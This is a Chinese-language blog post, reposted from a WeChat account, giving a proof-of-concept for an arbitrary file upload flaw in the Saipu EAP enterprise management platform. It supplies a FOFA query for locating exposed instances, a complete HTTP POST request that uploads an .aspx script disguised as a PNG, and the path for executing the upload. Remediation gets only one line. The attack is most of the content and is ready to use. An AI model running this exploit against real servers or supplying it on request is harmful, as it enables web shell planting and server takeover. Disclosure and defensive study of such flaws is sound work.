赛普EAP企业适配管理平台Upload任意文件上传漏洞 PoC

admin 2024年12月6日10:24:26评论27 views字数 1186阅读3分57秒阅读模式
简介

赛普EAP企业适配管理平台是为房地产企业量身定制的数字化管理系统,旨在优化业务流程、提升管理效率并改善客户体验。该系统整合了项目管理、销售管理、客户关系管理、财务管理和报表分析等多个功能模块,能够满足企业各个层级和不同部门的管理需求。通过灵活的配置机制,平台可以根据企业的具体需求进行定制化调整,从而实现与企业业务的高度契合。

赛普EAP企业适配管理平台Upload任意文件上传漏洞 PoC
漏洞描述
赛普EAP企业适配管理平台的Upload接口存在任意文件上传漏洞
fofa语法
body="IDWebSoft/"
漏洞复现
POST/IDWebSoft/Common/Handler/Upload.aspx HTTP/1.1Host: IPPriority: u=0User-Agent: Mozilla/5.0 (Macintosh; IntelMacOSX10.15; rv:132.0) Gecko/20100101 Firefox/132.0Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: multipart/form-data; boundary=---------------------------328367279028471380642525145085Accept: */*Content-Length: 251-----------------------------328367279028471380642525145085Content-Disposition: form-data; name="Filedata"; filename="222.aspx"Content-Type: image/png<% response.write("222")%>-----------------------------328367279028471380642525145085--
赛普EAP企业适配管理平台Upload任意文件上传漏洞 PoC
%7b%22name%22%3a%22222.aspx%22%2c%22path%22%3a%22%2fAccessary%2f2024%2f12%2f8861daf2-8569-4f07-8af7-81f7ed18dc6c.aspx%22%7durl解码为{"name":"222.aspx","path":"/Accessary/2024/12/8861daf2-8569-4f07-8af7-81f7ed18dc6c.aspx"}访问上传地址即可  http://IP/IDWebSoft/Accessary/2024/12/8861daf2-8569-4f07-8af7-81f7ed18dc6c.aspx
修复建议
限制文件类型
网安交流群

原文始发于微信公众号(白帽攻防):【漏洞复现】赛普EAP企业适配管理平台Upload任意文件上传漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月6日10:24:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   赛普EAP企业适配管理平台Upload任意文件上传漏洞 PoChttp://cn-sec.com/archives/3474528.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息